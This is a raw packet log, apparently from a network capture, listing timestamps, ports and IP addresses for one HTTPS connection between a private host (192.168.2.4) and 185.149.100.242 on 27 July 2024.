Jul 27, 2024 07:44:09.427690983 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.427726984 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.427732944 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.427769899 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.427784920 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.428061008 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.428086042 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.428118944 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.428124905 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.428150892 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.428158045 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.428320885 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.428522110 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.428546906 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.428574085 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.428579092 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.428605080 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.428616047 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.428966045 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.428992033 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.429024935 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.429032087 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.429048061 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.429068089 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.441915989 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.460675001 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.460716963 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.460745096 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.460751057 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.460776091 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.460788012 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.460910082 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.460952044 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.460968971 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.460975885 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.461009026 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.504291058 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.504337072 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.504400969 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.504415989 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.504443884 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.504463911 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.512412071 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.512451887 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.512496948 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.512502909 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.512531042 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.512542009 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.515995979 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.516037941 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.516077042 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.516082048 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.516108990 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.516119003 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.516253948 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.516294956 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.516314983 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.516320944 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.516335011 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.516361952 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.516586065 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.516628027 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.516649961 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.516655922 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.516680956 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.516689062 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.516942978 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.516983986 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.517004013 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.517009974 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.517031908 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.517050982 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.548429012 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.548468113 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.548626900 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.548634052 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.548681021 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.548696041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.548758984 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.548764944 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.548825979 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.591519117 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.591557026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.591708899 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.591710091 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.591717958 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.591763973 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.599858999 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.599896908 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.600033045 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.600033045 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.600058079 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.600104094 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.603442907 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.603487015 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.603523970 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.603550911 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.603568077 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.603687048 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.603729010 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.603733063 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.603749037 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.603761911 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.603782892 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.603794098 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.604012012 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.604063988 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.604084969 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.604094028 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.604118109 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.604134083 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.605439901 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.605483055 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.605505943 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.605513096 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.605529070 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.605542898 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.635858059 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.635898113 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.636157990 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.636178017 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.636298895 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.636342049 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.636393070 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.636393070 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.636413097 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.636430025 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.636457920 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.679327011 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.679363966 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.679636955 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.679636955 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.679657936 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.679891109 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.687649965 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.687690020 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.687719107 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.687741041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.687753916 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.687772036 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.691000938 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.691046000 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.691066027 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.691073895 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.691085100 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.691107035 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.691123009 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.691266060 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.691306114 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.691325903 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.691332102 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.691353083 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.691361904 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.691782951 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.691829920 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.691843987 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.691852093 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.691883087 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.691896915 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.692094088 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.692135096 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.692146063 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.692159891 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.692190886 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.692200899 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.723608971 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.723649025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.723761082 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.723761082 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.723781109 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.723975897 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.723995924 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.724015951 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.724033117 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.724045038 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.724061012 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.724075079 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.724095106 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.724112988 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.767513037 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.767576933 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.767698050 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.767718077 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.767752886 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.767752886 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.775293112 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.775332928 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.775450945 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.775450945 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.775471926 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.775635004 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.778407097 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.778455973 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.778614998 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.778614998 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.778635025 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.778681040 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.778985023 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.779036999 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.779052019 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.779062033 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.779092073 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.779108047 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.779316902 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.779364109 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.779380083 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.779388905 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.779414892 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.779429913 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.779671907 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.779721975 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.779740095 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.779747963 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.779767036 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.779788017 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.811775923 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.811805010 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.811959028 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.812031031 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.812263966 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.812263966 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.812284946 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.812417030 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.855053902 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.855112076 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.855186939 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.855210066 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.855341911 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.863035917 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.863084078 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.863105059 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.863111973 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.863148928 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.865983009 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.866022110 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.866054058 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.866075039 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.866090059 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.866755962 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.866806984 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.866821051 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.866827965 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.866866112 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.870073080 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.870115995 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.870148897 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.870156050 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.870176077 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.873720884 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.873769045 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.873805046 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.873811960 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.873842001 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.899301052 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.899317026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.899406910 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.899426937 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.899633884 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.899655104 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.899816036 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.899816036 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.899837017 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.943187952 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.943242073 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.943694115 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.943712950 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.950949907 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.950982094 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.951056957 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.951138020 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.951138020 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.951138020 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.951159000 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.953610897 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.953638077 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.953819990 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.953829050 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.954169989 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.954195023 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.954226017 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.954232931 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.954257965 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.958462954 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.958479881 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.958523989 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.958528996 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.958547115 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.958779097 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.958806038 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.958830118 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.958836079 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.958879948 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.986473083 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.986494064 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.986558914 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.986572981 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.987004995 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.987051964 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.987103939 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.987103939 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:09.987126112 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:09.987147093 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.030258894 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.030297041 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.030332088 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.030344009 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.030369043 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.038321018 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.038367987 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.038393974 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.038399935 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.038427114 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.042123079 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.042162895 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.042182922 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.042190075 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.042216063 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.042385101 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.042428970 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.042449951 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.042457104 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.042475939 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.046005964 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.046042919 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.046060085 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.046068907 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.046078920 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.046099901 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.046202898 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.046250105 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.046252966 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.046281099 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.046303988 CEST	62252	443	192.168.2.4	185.149.100.242
